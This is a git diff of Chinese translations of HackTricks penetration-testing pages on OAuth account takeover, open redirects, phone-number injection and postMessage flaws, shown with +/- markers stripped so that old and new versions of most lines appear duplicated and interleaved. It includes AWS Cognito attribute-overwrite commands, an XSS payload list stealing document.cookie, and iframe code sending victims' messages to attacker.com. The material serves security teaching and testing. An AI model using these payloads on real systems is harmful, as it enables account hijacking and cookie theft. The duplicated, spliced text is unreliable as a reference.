### 授权/刷新令牌未绑定到客户端
### Authorization/Refresh Token not bound to client
如果你能获得 **授权码并使用不同的客户端,那么你可以接管其他账户**。
如果你可以获取 **授权代码并在不同的客户端上使用它,那么你可以接管其他账户**。
### Happy Paths, XSS, Iframes 和 Post Messages 泄露 code 和 state 值
### Happy Paths, XSS, Iframes & Post Messages to leak code & state values
[**查看这篇文章**](https://labs.detectify.com/writeups/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/#gadget-2-xss-on-sandbox-third-party-domain-that-gets-the-url)
[**查看此帖子**](https://labs.detectify.com/writeups/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/#gadget-2-xss-on-sandbox-third-party-domain-that-gets-the-url)
### AWS Cognito <a href="#bda5" id="bda5"></a>
在这个漏洞赏金报告中:[**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) 你可以看到 **AWS Cognito** 返回给用户的 **令牌** 可能具有 **足够的权限来覆盖用户数据**。因此,如果你**将用户邮箱更改为其他用户的邮箱**,你可能能够 **接管** 其他账户。
在这个漏洞赏金报告中:[**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) 你可以看到 **AWS Cognito** 返回给用户的 **令牌** 可能具有 **足够的权限来覆盖用户数据**。因此,如果你可以 **将用户电子邮件更改为其他用户电子邮件**,你可能能够 **接管** 其他账户。
```bash
# Read info of the user
aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
@ -159,65 +160,65 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
]
}
```
有关如何滥用 AWS cognito 的详细信息,请查看:
For more detailed info about how to abuse AWS cognito check:
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum" %}
### 滥用其他应用程序的令牌 <a href="#bda5" id="bda5"></a>
### Abusing other Apps tokens <a href="#bda5" id="bda5"></a>
如[**这篇文章中提到的**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts)如果 OAuth 流程期望接收**令牌**(而不是代码),并且不检查令牌是否属于该应用程序,则可能存在漏洞
如[**这篇文章中提到的**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts)期望接收**token**而不是代码的OAuth流程可能会受到攻击如果它们没有检查token是否属于该应用程序
这是因为**攻击者**可以创建一个**支持 OAuth 并使用 Facebook 登录****应用程序**(例如)。然后,一旦受害者在**攻击者的应用程序**中使用 Facebook 登录,攻击者就可以获取**用户授予其应用程序的 OAuth 令牌,并使用该令牌登录受害者的 OAuth 应用程序**。
这是因为**攻击者**可以在自己的应用程序中创建一个**支持OAuth并使用Facebook登录的应用**(例如)。然后,一旦受害者在**攻击者的应用程序**中使用Facebook登录攻击者就可以获取**分配给其应用程序的用户的OAuth token并使用该token在受害者的OAuth应用程序中登录**。
{% hint style="danger" %}
因此,如果攻击者设法让用户访问其自己的 OAuth 应用程序,他将能够接管那些期望令牌且不检查令牌是否授予其应用程序 ID 的应用程序中的受害者账户。
因此,如果攻击者设法让用户访问自己的OAuth应用程序他将能够在期望token且未检查token是否授予其应用ID的应用程序中接管受害者的账户。
{% endhint %}
### 两个链接和 cookie <a href="#bda5" id="bda5"></a>
### Two links & cookie <a href="#bda5" id="bda5"></a>
根据[**这篇文章**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f),可以让受害者打开一个带有指向攻击者主机的**returnUrl**的页面。此信息将**存储在 cookie (RU) 中**,并且在**后续步骤**中,**提示**将**询问**用户是否愿意授予该攻击者主机访问权限。
根据[**这篇文章**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f),可以让受害者打开一个指向攻击者主机的**returnUrl**页面。此信息将被**存储在cookieRU**中,在**后续步骤**中,**提示**将**询问**用户是否希望授予对该攻击者主机的访问权限。
为了绕过此提示,可以打开一个标签页以启动**Oauth 流程**,该流程将使用**returnUrl**设置此 RU cookie在显示提示之前关闭标签页然后打开一个没有该值的新标签页。然后**提示不会通知攻击者的主机**,但 cookie 将设置为它,因此**令牌将在重定向中发送到攻击者的主机**。
为了绕过此提示,可以打开一个选项卡以启动**Oauth流程**,该流程将使用**returnUrl**设置此RU cookie在提示显示之前关闭选项卡然后打开一个没有该值的新选项卡。然后**提示不会通知攻击者的主机**但cookie将被设置为它因此**token将在重定向中发送到攻击者的主机**。
### 提示交互绕过 <a href="#bda5" id="bda5"></a>
### Prompt Interaction Bypass <a href="#bda5" id="bda5"></a>
如[**此视频**](https://www.youtube.com/watch?v=n9x7\_J\_a\_7Q)中所述,一些 OAuth 实现允许指示**`prompt`** GET 参数为 None (**`&prompt=none`**),以**防止用户在网络提示中被要求确认**已授予的访问权限,如果他们已经登录平台
正如[**在这段视频中解释的**](https://www.youtube.com/watch?v=n9x7\_J\_a\_7Q)一些OAuth实现允许将**`prompt`** GET参数指示为None**`&prompt=none`**),以**防止用户在已登录平台时被要求确认**所授予的访问权限
### response\_mode
如[**此视频**](https://www.youtube.com/watch?v=n9x7\_J\_a\_7Q)中所述,可以指示参数**`response_mode`**以指示希望代码在最终 URL 中提供的位置:
正如[**在这段视频中解释的**](https://www.youtube.com/watch?v=n9x7\_J\_a\_7Q)可能可以指示参数**`response_mode`**以指示希望在最终URL中提供代码的位置:
* `response_mode=query` -> 代码在 GET 参数中提供:`?code=2397rf3gu93f`
* `response_mode=fragment` -> 代码在 URL 片段参数中提供 `#code=2397rf3gu93f`
* `response_mode=form_post` -> 代码在带有名为 `code` 的输入和值的 POST 表单中提供
* `response_mode=web_message` -> 代码在 post 消息中发送:`window.opener.postMessage({"code": "asdasdasd...`
* `response_mode=query` -> 代码在GET参数中提供`?code=2397rf3gu93f`
* `response_mode=fragment` -> 代码在URL片段参数中提供`#code=2397rf3gu93f`
* `response_mode=form_post` -> 代码在一个名为`code`的POST表单中的输入中提供
* `response_mode=web_message` -> 代码通过post消息发送:`window.opener.postMessage({"code": "asdasdasd...`
### SSRFs 参数 <a href="#bda5" id="bda5"></a>
### SSRFs parameters <a href="#bda5" id="bda5"></a>
[**查看此研究**](https://portswigger.net/research/hidden-oauth-attack-vectors) **了解此技术的更多详细信息。**
[**查看这项研究**](https://portswigger.net/research/hidden-oauth-attack-vectors) **以获取此技术的更多详细信息。**
OAuth 中的动态客户端注册是安全漏洞的一个不太明显但至关重要的向量,特别是针对**服务器端请求伪造 (SSRF)** 攻击。此端点允许 OAuth 服务器接收有关客户端应用程序的详细信息,包括可能被利用的敏感 URL。
OAuth中的动态客户端注册作为一个不太明显但关键的安全漏洞向量,特别是针对**服务器端请求伪造SSRF**攻击。此端点允许OAuth服务器接收有关客户端应用程序的详细信息包括可能被利用的敏感URL。
**关键点:**
* **动态客户端注册**通常映射到 `/register` 并接受 `client_name`、`client_secret`、`redirect_uris` 和用于徽标或 JSON Web Key Sets (JWKs) 的 URL 等详细信息,通过 POST 请求
* 此功能遵循 **RFC7591****OpenID Connect Registration 1.0** 中规定的规范,这些规范包括可能易受 SSRF 攻击的参数。
* 注册过程可能会在多种方式下无意中暴露服务器以进行 SSRF 攻击
* **`logo_uri`**:客户端应用程序徽标的 URL服务器可能会获取该 URL从而触发 SSRF 或在 URL 处理不当时导致 XSS
* **`jwks_uri`**:客户端JWK 文档的 URL如果恶意构造可能导致服务器向攻击者控制的服务器发出出站请求。
* **`sector_identifier_uri`**:引用 `redirect_uris` JSON 数组,服务器可能会获取该数组,从而创建 SSRF 机会。
* **`request_uris`**:列出客户端允许请求 URI如果服务器在授权过程开始时获取这些 URI则可能被利用。
* **动态客户端注册**通常映射到`/register`,并接受如`client_name`、`client_secret`、`redirect_uris`和通过POST请求的logo或JSON Web Key SetsJWKsURL等详细信息
* 此功能遵循**RFC7591**和**OpenID Connect Registration 1.0**中列出的规范其中包括可能对SSRF易受攻击的参数。
* 注册过程可能会以多种方式无意中使服务器暴露于SSRF
* **`logo_uri`**:客户端应用程序logo的URL服务器可能会获取该URL从而触发SSRF或导致XSS如果URL处理不当
* **`jwks_uri`**客户端JWK文档的URL如果恶意构造可能导致服务器向攻击者控制的服务器发出外部请求。
* **`sector_identifier_uri`**:引用`redirect_uris`的JSON数组服务器可能会获取从而创建SSRF机会。
* **`request_uris`**:列出客户端允许请求URI如果服务器在授权过程开始时获取这些URI则可能被利用。
**利用策略:**
* 可以通过在 `logo_uri`、`jwks_uri` 或 `sector_identifier_uri` 等参数中注册带有恶意 URL 的新客户端来触发 SSRF。
* 虽然通过 `request_uris` 的直接利用可能会被白名单控制所缓解,但在授权阶段提供预先注册的、攻击者控制的 `request_uri` 可以促进 SSRF。
* 通过在`logo_uri`、`jwks_uri`或`sector_identifier_uri`等参数中注册带有恶意URL的新客户端可以触发SSRF。
* 尽管通过白名单控制可能会减轻直接通过`request_uris`的利用,但提供一个预先注册的、攻击者控制的`request_uri`可以在授权阶段促进SSRF。
## OAuth 提供者竞态条件
## OAuth providers Race Conditions
如果您正在测试的平台是 OAuth 提供者,请[**阅读此内容以测试可能的竞态条件**](race-condition.md)。
如果您正在测试的平台是OAuth提供者[**请阅读此文以测试可能的竞争条件**](race-condition.md)。
## 参考资料
## References
* [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
* [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
@ -226,16 +227,17 @@ OAuth 中的动态客户端注册是安全漏洞的一个不太明显但至关
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零到英雄学习 AWS 黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您希望在 HackTricks 中**宣传您的公司**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 周边**](https://peass.creator-spring.com)
* 发现[**The PEASS Family**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) **上关注我们**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github 仓库提交 PR 来分享您的黑客技巧**
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -1,28 +1,29 @@
# 开放式重定向
# Open Redirect
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 开放式重定向
## Open redirect
### 重定向到localhost或任意域
### 重定向到 localhost 或任意域
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}
### 开放式重定向到XSS
### Open Redirect 到 XSS
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
@ -68,7 +69,7 @@ javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
## Open Redirect 上传 svg 文件
## Open Redirect 上传 SVG 文件
```markup
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
@ -78,7 +79,7 @@ xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
## 常见注入参数
## 常见注入参数
```
/{payload}
?next={payload}
@ -164,8 +165,6 @@ response.redirect("~/mysafe-subdomain/login.aspx")
response.redirect("http://mysafedomain.com");
```
#### PHP
PHP
```php
<?php
/* browser redirections*/
@ -173,27 +172,28 @@ header("Location: http://mysafedomain.com");
exit;
?>
```
## 工具
## Tools
* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
## 资源
## Resources
* 在 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) 中,您可以找到模糊列表。\\
* 在 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) 你可以找到模糊测试列表。\\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\\
* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
{% hint style="success" %}
学习与实践 AWS Hacking<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP Hacking <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,43 +1,45 @@
# 电话号码注入
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
可以**在电话号码的末尾添加字符串**这些字符串可以用于利用常见注入XSS、SQLi、SSRF...甚至绕过保护:
可以**电话号码的末尾添加字符串**这些字符串可以用来利用常见的注入XSS、SQLi、SSRF...)或甚至绕过保护:
<figure><img src="../.gitbook/assets/image (461).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (941).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
**OTP绕过/暴力破解**的工作原理如下:
**OTP 绕过 / 暴力破解** 的工作方式如下:
<figure><img src="../.gitbook/assets/image (116).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
## 参考资料
## 参考
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,28 +1,29 @@
# PostMessage漏洞
# PostMessage 漏洞
## PostMessage漏洞
## PostMessage 漏洞
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能以检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -30,9 +31,9 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
***
## 发送**PostMessage**
## 发送 **PostMessage**
**PostMessage**使用以下函数发送消息:
**PostMessage** 使用以下函数发送消息:
```bash
targetWindow.postMessage(message, targetOrigin, [transfer]);
@ -58,11 +59,14 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
## loop until win.length == 1 (until the iframe is loaded)
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
```
请注意,**targetOrigin** 可以是 '\*' 或类似 _https://company.com_ 的 URL。在**第二种情况**中,**消息只能发送到该域**(即使窗口对象的来源不同)。如果使用**通配符****消息可以发送到任何域**,并将发送到窗口对象的来源。
注意,**targetOrigin** 可以是 '\*' 或像 _https://company.com._ 的 URL。\
**第二种情况** 中,**消息只能发送到该域**(即使窗口对象的来源不同)。\
如果使用 **通配符****消息可以发送到任何域**,并将发送到窗口对象的来源。
### 攻击 iframe 和 **targetOrigin** 中的通配符
正如[**此报告**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)中所解释的,如果您找到一个页面可以被**iframed**(没有 `X-Frame-Header` 保护)并且通过**postMessage**使用**通配符**\*)发送敏感消息,您可以**修改** **iframe** 的**来源**并将**敏感**消息**泄露**到您控制的域。请注意,如果页面可以被 iframed 但**targetOrigin**设置为 URL 而不是通配符,则此**技巧将无效**。
正如在 [**这份报告**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) 中所解释的,如果你发现一个可以被 **iframed** 的页面(没有 `X-Frame-Header` 保护)并且通过 **postMessage** 使用 **通配符** (\*) 发送 **敏感** 消息,你可以 **修改** **iframe****来源** 并将 **敏感** 消息 **泄露** 到一个由你控制的域。\
注意,如果页面可以被 iframed**targetOrigin****设置为一个 URL 而不是通配符**,这个 **技巧将不起作用**
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -77,10 +81,10 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
}
</script>
```
## addEventListener 漏洞利用
## addEventListener 利用
**`addEventListener`** 是 JS 使用的函数,用于声明期望接收 `postMessages` 的函数。\
将使用类似以下代码的代码:
**`addEventListener`** 是 JS 用来声明 **期望 `postMessages`** 的函数。\
将使用类似以下的代码:
```javascript
window.addEventListener("message", (event) => {
if (event.origin !== "http://example.org:8080")
@ -89,30 +93,38 @@ return;
// ...
}, false);
```
注意在这种情况下,代码的**第一件事**是**检查来源**。这非常**重要**,特别是如果页面将对接收到的信息进行**任何敏感**操作(例如更改密码)。**如果不检查来源,攻击者可以让受害者向这些端点发送任意数据**并更改受害者的密码(在这个例子中)。
### 枚举
为了在当前页面中找到事件监听器,您可以:
为了**查找当前页面中的事件监听器**,你可以:
- 在JS代码中搜索 `window.addEventListener``$(window).on`JQuery版本
- 在开发者工具控制台中执行:`getEventListeners(window)`
- 转到浏览器的开发者工具中的 _Elements --> Event Listeners_
- 使用浏览器扩展,如 [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) 或 [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)。这些浏览器扩展将拦截所有消息并显示给您。
* **搜索** JS 代码中的 `window.addEventListener``$(window).on` (_JQuery 版本_)
* **在** 开发者工具控制台中执行:`getEventListeners(window)`
### 源检查绕过
![](<../../.gitbook/assets/image (618) (1).png>)
- **`event.isTrusted`** 属性被认为是安全的,因为它仅对由真实用户操作生成的事件返回 `True`。尽管如果实施正确,绕过它是具有挑战性的,但它在安全检查中的重要性是显著的。
- 在 PostMessage 事件中使用 **`indexOf()`** 进行源验证可能会容易受到绕过。以下是说明此漏洞的示例:
* **在** 浏览器的开发者工具中转到 _Elements --> Event Listeners_
![](<../../.gitbook/assets/image (396).png>)
* 使用一个**浏览器扩展**,如 [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) 或 [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)。这些浏览器扩展将**拦截所有消息**并显示给你。
